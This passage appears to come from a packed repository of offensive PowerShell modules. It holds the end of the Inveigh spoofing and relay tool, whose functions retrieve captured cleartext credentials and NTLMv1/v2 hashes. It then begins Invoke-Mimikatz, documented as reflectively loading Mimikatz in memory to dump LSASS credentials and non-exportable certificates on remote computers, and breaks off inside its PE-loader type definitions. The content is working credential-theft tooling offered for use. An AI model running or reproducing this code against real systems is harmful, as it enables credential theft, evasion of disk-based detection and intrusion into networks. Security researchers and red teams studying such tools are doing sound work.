 }\n\n            $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()\n\n        }\n\n        if($inveigh.console_input)\n        {\n\n            if([Console]::KeyAvailable)\n            {\n                $inveigh.console_output = $false\n                BREAK console_loop\n            }\n        \n        }\n\n        Start-Sleep -m 5\n    }\n\n}\n\n}\n#End Invoke-Inveigh\n\nfunction Stop-Inveigh\n{\n    <#\n    .SYNOPSIS\n    Stop-Inveigh will stop all running Inveigh functions.\n    #>\n\n    if($inveigh)\n    {\n        if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running)\n        {\n\n            if($inveigh.HTTP_listener.IsListening)\n            {\n                $inveigh.HTTP_listener.Stop()\n                $inveigh.HTTP_listener.Close()\n            }\n            \n            if($inveigh.bruteforce_running)\n            {\n                $inveigh.bruteforce_running = $false\n                Write-Output(\"$(Get-Date -format 's') - Attempting to stop HTTP listener\")\n                $inveigh.HTTP_listener.server.blocking = $false\n                Start-Sleep -s 1\n                $inveigh.HTTP_listener.server.Close()\n                Start-Sleep -s 1\n                $inveigh.HTTP_listener.Stop()\n                Write-Output(\"Inveigh Brute Force exited at $(Get-Date -format 's')\")\n                $inveigh.log.Add(\"$(Get-Date -format 's') - Inveigh Brute Force exited\")  > $null\n\n                if($inveigh.file_output)\n                {\n                    \"$(Get-Date -format 's') - Inveigh Brute Force exited\" | Out-File $Inveigh.log_out_file -Append\n                }\n\n            }\n            \n            if($inveigh.relay_running)\n            {\n                $inveigh.relay_running = $false\n                Write-Output(\"Inveigh Relay exited at $(Get-Date -format 's')\")\n                $inveigh.log.Add(\"$(Get-Date -format 's') - Inveigh Relay exited\")  > $null\n\n                if($inveigh.file_output)\n                {\n                    \"$(Get-Date -format 's') - Inveigh Relay exited\" | Out-File $Inveigh.log_out_file -Append\n                }\n\n            } \n\n            if($inveigh.running)\n            {\n                $inveigh.running = $false\n                Write-Output(\"Inveigh exited at $(Get-Date -format 's')\")\n                $inveigh.log.Add(\"$(Get-Date -format 's') - Inveigh exited\")  > $null\n\n                if($inveigh.file_output)\n                {\n                    \"$(Get-Date -format 's') - Inveigh exited\" | Out-File $Inveigh.log_out_file -Append\n                }\n\n            } \n\n        }\n        else\n        {\n            Write-Output(\"There are no running Inveigh functions\")\n        }\n    \n        if($inveigh.HTTPS)\n        {\n            & \"netsh\" http delete sslcert ipport=0.0.0.0:443 > $null\n\n            try\n            {\n                $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store(\"My\",\"LocalMachine\")\n                $certificate_store.Open('ReadWrite')\n                $certificate = $certificate_store.certificates.Find(\"FindByThumbprint\",$inveigh.certificate_thumbprint,$FALSE)[0]\n                $certificate_store.Remove($certificate)\n                $certificate_store.Close()\n            }\n            catch\n            {\n                Write-Output(\"SSL Certificate Deletion Error - Remove Manually\")\n                $inveigh.log.Add(\"$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually\")  > $null\n\n                if($inveigh.file_output)\n                {\n                    \"$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually\" | Out-File $Inveigh.log_out_file -Append   \n                }\n\n            }\n        }\n\n        $inveigh.HTTP = $false\n        $inveigh.HTTPS = $false\n    }\n    else\n    {\n        Write-Output(\"There are no running Inveigh functions\")|Out-Null\n    }\n\n} \n\nfunction Get-Inveigh\n{\n    <#\n    .SYNOPSIS\n    Get-Inveigh will display queued Inveigh console output.\n    #>\n\n    while($inveigh.console_queue.Count -gt 0)\n    {\n\n        if($inveigh.output_stream_only)\n        {\n            Write-Output($inveigh.console_queue[0] + $inveigh.newline)\n            $inveigh.console_queue.RemoveRange(0,1)\n        }\n        else\n        {\n\n            switch -wildcard ($inveigh.console_queue[0])\n            {\n\n                \"Inveigh *exited *\"\n                {\n                    Write-Warning $inveigh.console_queue[0]\n                    $inveigh.console_queue.RemoveRange(0,1)\n                }\n\n                \"* written to *\"\n                {\n\n                    if($inveigh.file_output)\n                    {\n                        Write-Warning $inveigh.console_queue[0]\n                    }\n\n                    $inveigh.console_queue.RemoveRange(0,1)\n                }\n\n                \"* for relay *\"\n                {\n                    Write-Warning $inveigh.console_queue[0]\n                    $inveigh.console_queue.RemoveRange(0,1)\n                }\n\n                \"*SMB relay *\"\n                {\n                    Write-Warning $inveigh.console_queue[0]\n                    $inveigh.console_queue.RemoveRange(0,1)\n                }\n\n                \"* local administrator *\"\n                {\n                    Write-Warning $inveigh.console_queue[0]\n                    $inveigh.console_queue.RemoveRange(0,1)\n                }\n\n                default\n                {\n                    Write-Output $inveigh.console_queue[0]\n                    $inveigh.console_queue.RemoveRange(0,1)\n                }\n\n            }\n\n        }\n         \n    }\n\n}\n\nfunction Get-InveighCleartext\n{\n    <#\n    .SYNOPSIS\n    Get-InveighCleartext will get all captured cleartext credentials. \n\n    .PARAMETER Unique\n    Display only unique cleartext credentials.\n    #>\n\n    param\n    ( \n        [parameter(Mandatory=$false)][Switch]$Unique,\n        [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter\n    )\n\n    if($Unique)\n    {\n        Write-Output $inveigh.cleartext_list | Get-Unique\n    }\n    else\n    {\n        Write-Output $inveigh.cleartext_list\n    }\n\n}\n\nfunction Get-InveighNTLMv1\n{\n    <#\n    .SYNOPSIS\n    Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes.\n\n    .PARAMETER Unique\n    Display only the first captured challenge/response for each unique account.\n    \n    .PARAMETER Usernames\n    Display IP addresses and usernames for captured NTLMv2 challenge response hashes.\n    #>\n\n    param\n    ( \n        [parameter(Mandatory=$false)][Switch]$Unique,\n        [parameter(Mandatory=$false)][Switch]$Usernames,\n        [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter\n    )\n\n    if ($invalid_parameter)\n    {\n        throw \"$($invalid_parameter) is not a valid parameter.\"\n    }\n\n    if($Unique -and $Usernames)\n    {\n        throw \"Cannot use -Unique with -Usernames.\"\n    }\n\n    if($Unique)\n    {\n        $inveigh.NTLMv1_list.Sort()\n\n        foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)\n        {\n            $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(\":\",($unique_NTLMv1.IndexOf(\":\") + 2)))\n\n            if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)\n            {\n                Write-Output $unique_NTLMv1\n            }\n\n            $unique_NTLMv1_account_last = $unique_NTLMv1_account\n        }\n    }\n    elseif($Usernames)\n    {\n        Write-Output $inveigh.NTLMv1_username_list\n    }\n    else\n    {\n        Write-Output $inveigh.NTLMv1_list\n    }\n\n}\n\nfunction Get-InveighNTLMv2\n{\n    <#\n    .SYNOPSIS\n    Get-InveighNTLMv2 will get captured NTLMv2 challenge/response hashes.\n\n    .PARAMETER Unique\n    Display only the first captured challenge/response for each unique account.\n\n    .PARAMETER Usernames\n    Display IP addresses and usernames for captured NTLMv2 challenge response hashes.\n    #>\n\n    param\n    ( \n        [parameter(Mandatory=$false)][Switch]$Unique,\n        [parameter(Mandatory=$false)][Switch]$Usernames,\n        [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter\n    )\n\n    if($invalid_parameter)\n    {\n        throw \"$($invalid_parameter) is not a valid parameter.\"\n    }\n\n    if($Unique -and $Usernames)\n    {\n        throw \"Cannot use -Unique with -Usernames.\"\n    }\n\n    if($Unique)\n    {\n        $inveigh.NTLMv2_list.Sort()\n\n        foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)\n        {\n            $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(\":\",($unique_NTLMv2.IndexOf(\":\") + 2)))\n\n            if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)\n            {\n                Write-Output $unique_NTLMv2\n            }\n\n            $unique_NTLMv2_account_last = $unique_NTLMv2_account\n        }\n    }\n    elseif($Usernames)\n    {\n        Write-Output $inveigh.NTLMv2_username_list\n    }\n    else\n    {\n        Write-Output $inveigh.NTLMv2_list\n    }\n\n}\n\nfunction Get-InveighLog\n{\n    <#\n    .SYNOPSIS\n    Get-InveighLog will get log entries.\n    #>\n\n    Write-Output $inveigh.log\n}\n\nfunction Watch-Inveigh\n{\n    <#\n    .SYNOPSIS\n    Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.\n    #>\n\n    if($inveigh.tool -ne 1)\n    {\n\n        if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running)\n        {\n            Write-Output \"Press any key to stop real time console output\"\n            $inveigh.console_output = $true\n\n            :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))\n            {\n\n                while($inveigh.console_queue.Count -gt 0)\n                {\n\n                    if($inveigh.output_stream_only)\n                    {\n                        Write-Output($inveigh.console_queue[0] + $inveigh.newline)\n                        $inveigh.console_queue.RemoveRange(0,1)\n                    }\n                    else\n                    {\n\n                        switch -wildcard ($inveigh.console_queue[0])\n                        {\n                          \n                            \"Inveigh *exited *\"\n                            {\n                                Write-Warning $inveigh.console_queue[0]\n                                $inveigh.console_queue.RemoveRange(0,1)\n                            }\n\n                            \"* written to *\"\n                            {\n\n                                if($inveigh.file_output)\n                                {\n                                    Write-Warning $inveigh.console_queue[0]\n                                }\n\n                                $inveigh.console_queue.RemoveRange(0,1)\n                            }\n\n                            \"* for relay *\"\n                            {\n                                Write-Warning $inveigh.console_queue[0]\n                                $inveigh.console_queue.RemoveRange(0,1)\n                            }\n\n                            \"*SMB relay *\"\n                            {\n                                Write-Warning $inveigh.console_queue[0]\n                                $inveigh.console_queue.RemoveRange(0,1)\n                            }\n\n                            \"* local administrator *\"\n                            {\n                                Write-Warning $inveigh.console_queue[0]\n                                $inveigh.console_queue.RemoveRange(0,1)\n                            }\n\n                            default\n                            {\n                                Write-Output $inveigh.console_queue[0]\n                                $inveigh.console_queue.RemoveRange(0,1)\n                            }\n\n                        }\n\n                    }\n                             \n                }\n\n                if([Console]::KeyAvailable)\n                {\n                    $inveigh.console_output = $false\n                    BREAK console_loop\n                }\n\n                Start-Sleep -m 5\n            }\n\n        }\n        else\n        {\n            Write-Output \"Inveigh isn't running\"\n        }\n\n    }\n    else\n    {\n        Write-Output \"Watch-Inveigh cannot be used with current external tool selection\"\n    }\n\n}\n\nfunction Clear-Inveigh\n{\n    <#\n    .SYNOPSIS\n    Clear-Inveigh will clear Inveigh data from memory.\n    #>\n\n    if($inveigh)\n    {\n\n        if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.bruteforce_running)\n        {\n            Remove-Variable inveigh -scope global\n            Write-Output \"Inveigh data has been cleared from memory\"\n        }\n        else\n        {\n            Write-Output \"Run Stop-Inveigh before running Clear-Inveigh\"\n        }\n\n    }\n\n}\n"
  },
  {
    "path": "modules/Invoke-Mimikatz.ps1",
    "content": "function Invoke-Mimikatz\n{\n<#\n.SYNOPSIS\n\nThis script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as\ndump credentials without ever writing the mimikatz binary to disk. \nThe script has a ComputerName parameter which allows it to be executed against multiple computers.\n\nThis script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.\n\nFunction: Invoke-Mimikatz\nAuthor: Joe Bialek, Twitter: @JosephBialek\nMimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: benjamin@gentilkiwi.com. Twitter @gentilkiwi\nLicense:  http://creativecommons.org/licenses/by/3.0/fr/\nRequired Dependencies: Mimikatz (included)\nOptional Dependencies: None\nVersion: 1.5\nReflectivePEInjection version: 1.1\nMimikatz version: 2.0 alpha (2/16/2015)\n\n.DESCRIPTION\n\nReflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any \nfunctionality provided with Mimikatz.\n\n.PARAMETER DumpCreds\n\nSwitch: Use mimikatz to dump credentials out of LSASS.\n\n.PARAMETER DumpCerts\n\nSwitch: Use mimikatz to export all private certificates (even if they are marked non-exportable).\n\n.PARAMETER Command\n\nSupply mimikatz a custom command line. This works exactly the same as running the mimikatz executable like this: mimikatz \"privilege::debug exit\" as an example.\n\n.PARAMETER ComputerName\n\nOptional, an array of computernames to run the script on.\n\t\n.EXAMPLE\n\nExecute mimikatz on the local computer to dump certificates.\nInvoke-Mimikatz -DumpCerts\n\n.EXAMPLE\n\nExecute mimikatz on two remote computers to dump credentials.\nInvoke-Mimikatz -DumpCreds -ComputerName @(\"computer1\", \"computer2\")\n\n.EXAMPLE\n\nExecute mimikatz on a remote computer with the custom command \"privilege::debug exit\" which simply requests debug privilege and exits\nInvoke-Mimikatz -Command \"privilege::debug exit\" -ComputerName \"computer1\"\n\n.NOTES\nThis script was created by combining the Invoke-ReflectivePEInjection script written by Joe Bialek and the Mimikatz code written by Benjamin DELPY\nFind Invoke-ReflectivePEInjection at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectivePEInjection\nFind mimikatz at: http://blog.gentilkiwi.com\n\n.LINK\n\nBlog: http://clymb3r.wordpress.com/\nBenjamin DELPY blog: http://blog.gentilkiwi.com\n\nGithub repo: https://github.com/clymb3r/PowerShell\nmimikatz Github repo: https://github.com/gentilkiwi/mimikatz\n\nBlog on reflective loading: http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/\nBlog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/\n\n#>\n\n[CmdletBinding(DefaultParameterSetName=\"DumpCreds\")]\nParam(\n\t[Parameter(Position = 0)]\n\t[String[]]\n\t$ComputerName,\n\n    [Parameter(ParameterSetName = \"DumpCreds\", Position = 1)]\n    [Switch]\n    $DumpCreds,\n\n    [Parameter(ParameterSetName = \"DumpCerts\", Position = 1)]\n    [Switch]\n    $DumpCerts,\n\n    [Parameter(ParameterSetName = \"CustomCommand\", Position = 1)]\n    [String]\n    $Command\n)\n\nSet-StrictMode -Version 2\n\n\n$RemoteScriptBlock = {\n\t[CmdletBinding()]\n\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[String]\n\t\t$PEBytes64,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n\t\t[String]\n\t\t$PEBytes32,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $false)]\n\t\t[String]\n\t\t$FuncReturnType,\n\t\t\t\t\n\t\t[Parameter(Position = 3, Mandatory = $false)]\n\t\t[Int32]\n\t\t$ProcId,\n\t\t\n\t\t[Parameter(Position = 4, Mandatory = $false)]\n\t\t[String]\n\t\t$ProcName,\n\n        [Parameter(Position = 5, Mandatory = $false)]\n        [String]\n        $ExeArgs\n\t)\n\t\n\t###################################\n\t##########  Win32 Stuff  ##########\n\t###################################\n\tFunction Get-Win32Types\n\t{\n\t\t$Win32Types = New-Object System.Object\n\n\t\t#Define all the structures/enums that will be used\n\t\t#\tThis article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html\n\t\t$Domain = [AppDomain]::CurrentDomain\n\t\t$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')\n\t\t$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t\t$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)\n\t\t$ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]\n\n\n\t\t############    ENUM    ############\n\t\t#Enum MachineType\n\t\t$TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])\n\t\t$TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null\n\t\t$MachineType = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType\n\n\t\t#Enum MagicType\n\t\t$TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])\n\t\t$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null\n\t\t$MagicType = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType\n\n\t\t#Enum SubSystemType\n\t\t$TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null\n\t\t$SubSystemType = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType\n\n\t\t#Enum DllCharacteristicsType\n\t\t$TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])\n\t\t$TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null\n\t\t$DllCharacteristicsType = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType\n\n\t\t###########    STRUCT    ###########\n\t\t#Struct IMAGE_DATA_DIRECTORY\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)\n\t\t($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null\n\t\t($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null\n\t\t$IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY\n\n\t\t#Struct IMAGE_FILE_HEADER\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)\n\t\t$TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null\n\t\t$IMAGE_FILE_HEADER = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER\n\n\t\t#Struct IMAGE_OPTIONAL_HEADER64\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)\n\t\t($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null\n\t\t($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null\n\t\t($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null\n\t\t($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null\n\t\t($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null\n\t\t($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null\n\t\t($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null\n\t\t($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null\n\t\t($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null\n\t\t($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null\n\t\t($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null\n\t\t($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null\n\t\t($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null\n\t\t($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null\n\t\t($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null\n\t\t($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null\n\t\t($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null\n\t\t($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null\n\t\t($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null\n\t\t($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null\n\t\t($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null\n\t\t($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null\n\t\t($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null\n\t\t($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null\n\t\t($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null\n\t\t($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null\n\t\t$IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64\n\n\t\t#Struct IMAGE_OPTIONAL_HEADER32\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)\n\t\t($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null\n\t\t($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null\n\t\t($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null\n\t\t($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null\n\t\t($TypeBuilder.DefineField('FileAlignment', [UInt32], 